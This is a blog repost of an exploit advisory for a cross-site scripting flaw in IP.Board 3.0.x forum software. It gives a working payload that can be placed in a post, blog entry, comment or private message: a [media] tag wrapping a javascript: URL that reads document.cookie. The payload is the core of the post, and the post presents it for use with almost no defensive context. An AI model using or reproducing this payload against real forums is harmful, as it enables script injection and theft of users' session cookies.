/home/mb3e/

♺ Google is the best teacher ♺ | University of Gunadarma IT ☺

IP.Board 3.0.x cross site scripting

Text : 


# Exploit Title: IP.Board 3.0.x XSS
# Date: 05/16/2010
# Author: Cryptovirus (http://de.crypt.in)
# Software Link: http://community.invisionpower.com/
# Version: 3.0.x
# Tested on: All
# Code :

The following code, when put in a post, blog entry, comment, or PM, lets
JavaScript run:

[media]javascript://%0aalert(document.cookie);%2F%2F.swf[/media]





Arrow  References :  http://securityreason.com/wlb_show/WLB-2010050088
  • IP.Board 3.0.x cross site scripting
  • Unknown
  • May 19, 2010
  • No comments:
 

0 comments:

Post a Comment

silahkan tinggalkan komentar anda disini .. :D

Subscribe to: Post Comments (Atom)